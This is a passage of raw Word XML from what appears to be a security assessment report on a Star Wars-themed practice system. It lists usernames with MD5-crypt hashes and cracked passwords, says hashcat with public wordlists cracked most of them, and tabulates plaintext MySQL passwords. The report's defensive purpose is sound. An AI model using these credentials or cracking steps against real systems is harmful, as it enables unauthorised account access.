              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18EB202F" w14:textId="1236EB11" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>$1$fcLm/bsU$h911x4TKKLsIpXtGNObge0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3E6F56" w14:textId="08C638CD" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00564B2B">
              <w:t>earthsong</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5172" w14:paraId="31D99495" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="236A8A17" w14:textId="3FB58B4D" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="494069C6" w14:textId="7362EC7A" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>$1$.SpsAg</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007A5172">
              <w:t>0u$nxfs.N.hbfth</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007A5172">
              <w:t>.cDb5FvCh0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4726AD77" w14:textId="377DBC88" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00564B2B">
              <w:t>evilempire</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5172" w14:paraId="66D83904" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0325F69E" w14:textId="4A93591E" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6272C0BF" w14:textId="463A5C54" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>$1$sKEYtcIE$uJilid4I4hsNp1yqJYexQ/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="675945D0" w14:textId="6DB67FC0" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00564B2B">
              <w:t>casiopia</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5172" w14:paraId="2666B644" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10104358" w14:textId="06218E20" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A5172">
              <w:t>imperial_guards</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF4483B" w14:textId="57DBC503" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>$1$BvNyU6pr$hvRr</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007A5172">
              <w:t>/.agjvappIptPuaV</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007A5172">
              <w:t>4/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6883E14A" w14:textId="0D4FDA7F" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00564B2B">
              <w:t>walkoflife</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5172" w14:paraId="294D79CD" w14:textId="77777777" w:rsidTr="007A5172">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2918" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D6B1523" w14:textId="6C53D866" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007A5172">
              <w:t>captain_needa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3207" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2016AFAA" w14:textId="22D2B014" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="007A5172">
              <w:t>$1$aomC0NO3$02xX.hD0UveBZPJ91gWNE1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2891" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215DDF55" w14:textId="052FB6FC" w:rsidR="007A5172" w:rsidRDefault="007A5172" w:rsidP="007A5172">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AC440BD" w14:textId="76B49742" w:rsidR="007A5172" w:rsidRDefault="00E46727" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">5/6 of these users had their password cracked using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a custom wordlist that is comprised of only public wordlists including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>rockyou</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091BB12C" w14:textId="0B7FA4FA" w:rsidR="00144F32" w:rsidRDefault="00144F32" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8D0A7" w14:textId="51001C2F" w:rsidR="00144F32" w:rsidRDefault="00144F32" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Same as for /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C46211A" w14:textId="704EDB62" w:rsidR="00FF1DAB" w:rsidRDefault="00FF1DAB" w:rsidP="007A5172">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD1C965" w14:textId="4C9A0494" w:rsidR="00CF228F" w:rsidRDefault="00CF228F" w:rsidP="00CF228F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc49875743"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MySQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="4BAE8E7C" w14:textId="03D69958" w:rsidR="00CF228F" w:rsidRDefault="00CF228F" w:rsidP="00CF228F">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>Hashing algorithm: None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B3F67" w14:paraId="56F44EE1" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A66A903" w14:textId="2080B5ED" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00CF228F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6EC123" w14:textId="6BBD4FB3" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00CF228F">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-NZ"/>
              </w:rPr>
              <w:t>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="67DB85CC" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7582EE9E" w14:textId="435687A9" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>storm_trooper_1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B091E48" w14:textId="6F2B3C5C" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>theDARKside</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="59C19A4D" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA8D48C" w14:textId="7FD74EB7" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46EEFF36" w14:textId="46CE1EBB" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>stillup2nogood</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="2C9FF9C7" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73495416" w14:textId="46C63215" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F2BC135" w14:textId="2AC5BB2E" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darksidethugs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="18C173ED" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103E13DF" w14:textId="3F06A235" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="388D1DEA" w14:textId="1CCB63D5" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>supertrooper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="1F9D570B" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5088FD60" w14:textId="3B06696F" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>storm_trooper_</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326D2125" w14:textId="13360C5D" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>kittenswithmittens</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="5BA968AA" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72210939" w14:textId="30499D1F" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>imperial_guards</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786BD3CD" w14:textId="1B045016" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darkside2700</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="64DE4433" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D213214" w14:textId="121401C7" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>captain_needa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D8AE775" w14:textId="16BC201C" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darksidegod@hotmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="481B4595" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DEB4A6B" w14:textId="3CFC77E6" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>admiral_piett</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0692C84F" w14:textId="1427C32D" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>DarkSideForever0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="4B3482FF" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59493886" w14:textId="204F7E05" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>admiral_ozzel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="690A4CE3" w14:textId="7ACE5FE0" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>theadmiral</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="429EE6A5" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38924502" w14:textId="79C26A12" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>general_veers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E6E256E" w14:textId="351B13E6" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darkside131</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="1F3F6BC8" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6503212E" w14:textId="08A6F457" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>emperor_palpatine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441CC85D" w14:textId="14A35E43" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darkside</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="28CF03E9" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F16A2E2" w14:textId="1A60DC5B" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darth_sidious</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0273A008" w14:textId="1369D166" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darksideismine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="50970D1F" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D5D38C" w14:textId="2A2D1369" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>boba_fett</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E215A6F" w14:textId="3C90ADB9" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>bountyhunter1976</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="5B59C900" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DDF2BF6" w14:textId="08CA3174" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>death_star_admin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A66412" w14:textId="6C402A8D" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>deathstar313</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB3F67" w14:paraId="4D2BA63B" w14:textId="77777777" w:rsidTr="00EB3F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E80E343" w14:textId="47F11D78" w:rsidR="00EB3F67" w:rsidRDefault="00EB3F67" w:rsidP="00B27F01">
            <w:pPr>
              <w:pStyle w:val="Monospace"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB3F67">
              <w:t>darth_vader</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
